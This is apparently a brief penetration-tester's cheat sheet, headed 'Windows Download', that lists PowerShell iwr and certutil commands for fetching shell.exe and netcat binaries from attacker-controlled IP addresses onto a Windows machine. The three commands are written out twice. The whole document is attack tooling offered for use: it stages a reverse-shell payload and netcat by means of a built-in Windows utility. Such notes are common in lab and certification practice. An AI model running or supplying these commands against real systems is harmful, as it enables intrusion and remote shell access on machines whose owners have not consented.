Windows Download
Powershell
iwr -uri http://192.168.45.163/shell.exe -Outfile shell.exe
cmd
certutil -urlcache -split -f http://192.168.45.246/nc64.exe C:\Users\Public\nc64.exe
certutil -urlcache -split -f http://172.16.1.2:8080/nc.exe nc.exe
iwr -uri http://192.168.45.163/shell.exe -Outfile shell.exe
certutil -urlcache -split -f http://192.168.45.246/nc64.exe C:\Users\Public\nc64.exe
certutil -urlcache -split -f http://172.16.1.2:8080/nc.exe nc.exe